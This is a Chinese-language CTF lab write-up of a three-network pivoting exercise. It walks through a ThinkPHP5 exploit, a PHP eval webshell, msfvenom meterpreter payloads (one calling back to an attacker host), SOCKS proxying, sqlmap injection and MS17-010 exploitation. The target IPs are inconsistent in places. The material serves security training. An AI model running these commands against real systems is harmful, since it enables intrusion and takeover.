CTF大賽模擬-CFS三層內網漫游
環境:
三臺虛擬機,三個網路,
target 1:192.168.161.178 ,192.168.52.132 (linux)
target 2:192.168.52.133, 192.168.72.131 (linux)
target 3: 192.168.72.132 (win7)
攻擊者只能與target 1進行通訊
外網打點
訪問192.168.161.178:80
發現是thinkphp5的版本
tp漏洞利用
用tp5檢測工具
漏洞存在
寫入后門:
echo '<?php eval($_REQUEST[x]);?>' > /www/wwwroot/ThinkPHP/public
/x.php
蟻劍連接
得到第一個flag
msf生成后門
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=1111 -f elf >t1.elf
上傳成功
msf監聽:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST kali的ip
set LPORT 1111
exploit
上線成功
52網段主機發現
ipconfig查看ip資訊
發現存在52網段
添加路由:run autoroute -s 192.168.52.0/24
開啟本地代理:(創建SOCK5協議代理)
use auxiliary/server/socks5
set srvport 1080
exploit
利用本地代理介面訪問
在kali上修改/etc/proxychains.conf組態檔
socks5 socks服務器ip 埠
kali使用proxychains nmap -sT -Pn 192.168.52.0/24 -p80
探針52網段存活主機
-Pn:掃描主機檢測其是否受到資料包過濾軟體或防火墻的保護,
-sT:掃描TCP資料包已建立的連接connect
存在ip 192.168.52.133 且80埠開放
本機利用代理工具SocksCap64,將瀏覽器加到代理上,這樣用瀏覽器走的就是sock代理服務器
訪問網站
sql注入
在源代碼中找到提示該頁面存在sql注入
kali上使用代理sqlmap
proxychains sqlmap/sqlmap.py -u "http://192.168.52.128/index.php?r=vul&keyword=1"
打出后臺賬號密碼
登陸后臺
http://192.168.52.128/index.php?r=admini/public/login
得到第二個flag
在模板中寫入一句話后門
設定蟻劍代理
連接成功
得到第三個flag
準備msf上線該主機
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
生成正向后門,因為反向目標找不到你的路由地址
設定監聽
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.52.128 目標ip
set LPORT 3333
exploit
72網段主機發現
msf上線 run get_local_subnets 獲取網路介面
發現存在72網段
run autoroute -s 192.168.72.0/24 添加個72網段的路由
72網段主機發現
proxychains nmap -Pn -sT 192.168.72.0/24
驗證ms17010
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp //正向連接
set RHOSTS 192.168.72.132 //攻擊目標
set RHOST 192.168.72.132 //連接目標
exploit
獲得最高權限
得到flag
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/456152.html
標籤:其他